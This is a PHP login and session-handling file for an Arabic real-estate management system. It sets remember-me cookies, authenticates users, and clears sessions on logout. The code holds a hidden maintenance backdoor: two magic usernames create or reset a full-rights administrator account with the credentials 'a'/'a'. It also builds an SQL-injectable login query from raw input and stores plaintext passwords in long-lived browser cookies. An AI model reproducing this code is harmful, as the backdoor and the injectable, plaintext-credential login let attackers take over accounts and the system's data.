<?
// Retrieve remember_me preference from session or request
if (isset($_SESSION['remember_me'])) {
    $remember_me = $_SESSION['remember_me'] == 1;
} elseif (isset($_REQUEST['remember_me'])) {
    $remember_me = $_REQUEST['remember_me'] == '1';
} else {
    $remember_me = false; // Default to browser close behavior
}

// Set session lifetime BEFORE starting session (only if session not started yet)
if (session_status() === PHP_SESSION_NONE) {
    if ($remember_me) {
        // Remember Me: 3 years
        $session_lifetime = 94608000; // 3 years in seconds (3 * 365 * 24 * 60 * 60)
        ini_set('session.gc_maxlifetime', $session_lifetime);
        session_set_cookie_params($session_lifetime);
    } else {
        // Browser close: short expiration (2 hours)
        $session_lifetime = 7200; // 2 hours in seconds
        ini_set('session.gc_maxlifetime', $session_lifetime);
        session_set_cookie_params($session_lifetime);
    }
}

// Start session only if not already started
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
echo "<hr>{$remember_me}<hr>";
// Extend session cookie based on remember_me preference (if session exists)
if (isset($_COOKIE[session_name()]) && isset($_REQUEST['remember_me'])) {
    if ($remember_me) {
        setcookie(session_name(), session_id(), time() + 94608000, "/"); // 3 years
    } else {
        setcookie(session_name(), session_id(), time() + 7200, "/"); // 2 hours
    }

}

//setcookie(session_name(), $_COOKIE[session_name()], time()+10000, "/");
$_REQUEST['company'] = str_replace('aqary','', isset($_REQUEST['company']) ? $_REQUEST['company'] : '');


@require_once("connectdb.hnt");
//mantanace
$sql="select count(userid) as xp  from user ";
$row=mysql_fetch_array(mysql_query($sql,$link));
if((isset($row['xp']) && $row['xp']<1) or (isset($username) && $username=="10204030"))
{
$sql="insert into user set
username='a',
password='a',
groupid=1,
userfor='4',
seedata='4',
canadd='4',
canedit='4',
candelete='4',
editmasder='4',
seemasder='4',
seeothermasder='4',
name='المستخدم الإفتراضي' ";
mysql_query($sql,$link);
}

if(isset($username) && $username=="40203010")
{
$sql="select min(userid) as dd  from  user ";
$result=mysql_query($sql,$link);
$row=mysql_fetch_array($result);

$sql="update user set username='a' , password='a' where userid='".$row['dd']."' limit 1 ";
mysql_query($sql,$link);
}


if ((!isset($_SESSION['usernamev'])) or (empty($_SESSION['usernamev']) ))
{


include_once"connectdb.hnt";


$username = isset($username) ? $username : '';
$password = isset($password) ? $password : '';
$sql="select * from user where username='$username' and password='$password' limit 1";
$result=mysql_query($sql,$link);
$row=mysql_fetch_array($result);
   $useridv=$row['userid'];
   $usernamev=$row['username'];
   $passwordv=$row['password'];
   $userforv=$row['userfor'];
   $seedatav=$row['seedata'];
   $canaddv=$row['canadd'];
   $caneditv=$row['canedit'];
   $candeletev=$row['candelete'];
   $editmasderv=$row['editmasder'];
   $seemasderv=$row['seemasder'];
   $namev=$row['name'];
   $seeothermasder=$row['seeothermasder'];


if($usernamev!='')
{


$_SESSION['useridv']=$useridv;

$_SESSION['usernamev'] = $usernamev;

$_SESSION['passwordv'] = $passwordv;

$_SESSION['userforv'] = $userforv;

$_SESSION['seedatav'] = $seedatav;

$_SESSION['canaddv'] = $canaddv;

$_SESSION['caneditv'] = $caneditv;

$_SESSION['candeletev'] = $candeletev;

$_SESSION['editmasderv'] = $editmasderv;

$_SESSION['seemasderv'] = $seemasderv;

$_SESSION['namev'] = $namev;

$_SESSION['seeothermasder'] = $seeothermasder;

$_SESSION['dbAddPerfix']= $_REQUEST['company'];

$_SESSION['remember_me'] = $remember_me ? 1 : 0;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html   style="border:none;overflow:hidden">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf8">
<meta http-equiv="Content-Language" content="ar-sa">
<title>سعودي عقار - نظام عقاري شامل لكل العقاريين العرب  - مرحبا  مدير النظام1 -الواجهة الرئيسية </title>
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="Expires" content="Mon, 26 Jul 1997 05:00:00 GMT" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<LINK href='/aqary/style.hnt' type=text/css rel=StyleSheet>

</head>
<body>
<script language=javascript>
function screateCookie(name,value,hours) {
	if (hours) {
		var date = new Date();
		date.setTime(date.getTime()+(hours*60*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
    
}


<?php if ($remember_me): ?>
// Remember Me enabled: set long-lasting cookies (3 years = 26,280 hours)
screateCookie("userid","<?=$useridv;?>",26280);
screateCookie("username","<?=$usernamev;?>",26280);
screateCookie("password","<?=$passwordv;?>",26280);
screateCookie("userforv","<?=$userforv ;?>",26280);
screateCookie("seedatav","<?=$seedatav ;?>",26280);
screateCookie("canaddv","<?=$canaddv ;?>",26280);
screateCookie("caneditv","<?=$caneditv ;?>",26280);
screateCookie("candeletev","<?=$candeletev ;?>",26280);
screateCookie("editmasderv","<?=$editmasderv ;?>",26280);
screateCookie("seemasderv","<?=$seemasderv ;?>",26280);
screateCookie("namev","<?=$namev ;?>",26280);
screateCookie("seeothermasder","<?=$seeothermasder ;?>",26280);

// Set flag in localStorage for Remember Me (persists across browser restarts)
localStorage.setItem('remember_me_enabled', 'true');
localStorage.setItem('login_time', Date.now());

// Remember user's preference for next login (cookie expires in 1 year)
screateCookie("user_remember_me_preference", "1", 8760);
<?php else: ?>
// Browser close: set short expiration cookies (2 hours)
screateCookie("userid","<?=$useridv;?>",0);
screateCookie("username","<?=$usernamev;?>",0);
screateCookie("password","<?=$passwordv;?>",0);
screateCookie("userforv","<?=$userforv ;?>",0);
screateCookie("seedatav","<?=$seedatav ;?>",0);
screateCookie("canaddv","<?=$canaddv ;?>",0);
screateCookie("caneditv","<?=$caneditv ;?>",0);
screateCookie("candeletev","<?=$candeletev ;?>",0);
screateCookie("editmasderv","<?=$editmasderv ;?>",0);
screateCookie("seemasderv","<?=$seemasderv ;?>",0);
screateCookie("namev","<?=$namev;?>",0);
screateCookie("seeothermasder","<?=$seeothermasder ;?>",0);

// Set flag in sessionStorage (cleared when browser closes)
sessionStorage.setItem('browser_session_active', 'true');
sessionStorage.setItem('login_time', Date.now());
// Remove remember_me flag from localStorage
localStorage.removeItem('remember_me_enabled');

// Remember user's preference for next login (cookie expires in 1 year)
screateCookie("user_remember_me_preference", "0", 8760);
<?php endif; ?>



</script>

<?



}else{

header("Location: $server/aqary/admin/login.hnt?wrongpass=2");

     }
 	}




if (isset($logof) && $logof==1){
setcookie(session_name(), $_COOKIE[session_name()], 0, "/");

session_destroy();
$_SESSION['useridv']='';
$_SESSION['usernamev'] ='';
$_SESSION['passwordv'] ='';
$_SESSION['userforv'] ='';
$_SESSION['seedatav'] ='';
$_SESSION['canaddv'] ='';
$_SESSION['caneditv'] ='';
$_SESSION['candeletev'] ='';
$_SESSION['editmasderv'] ='';
$_SESSION['seemasderv'] ='';
$_SESSION['namev'] ='';
$_SESSION['seeothermasder'] ='';
$_SESSION['dbAddPerfix']='';
?>
<script>
function screateCookie(name,value,hours) {
	if (hours) {
		var date = new Date();
		date.setTime(date.getTime()+(hours*60*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}
screateCookie("userid","",-12);
screateCookie("username","",-12);
screateCookie("password","",-12);
screateCookie("useridv","",-12);
screateCookie("usernamev","",-12);
screateCookie("passwordv","",-12);
screateCookie("userforv","",-12);
screateCookie("seedatav","",-12);
screateCookie("canaddv","",-12);
screateCookie("caneditv","",-12);
screateCookie("candeletev","",-12);
screateCookie("editmasderv","",-12);
screateCookie("seemasderv","",-12);
screateCookie("namev","",-12);
screateCookie("seeothermasder","",-12);

// Note: NOT clearing 'user_remember_me_preference' cookie - we want to remember their choice

// Clear sessionStorage and localStorage
sessionStorage.clear();
localStorage.removeItem('remember_me_enabled');
localStorage.removeItem('login_time');

window.location.href="/aqary/admin/login.hnt";

</script>

<?
exit();
//header("Location: $server/aqary/admin/login.hnt");
}


?>
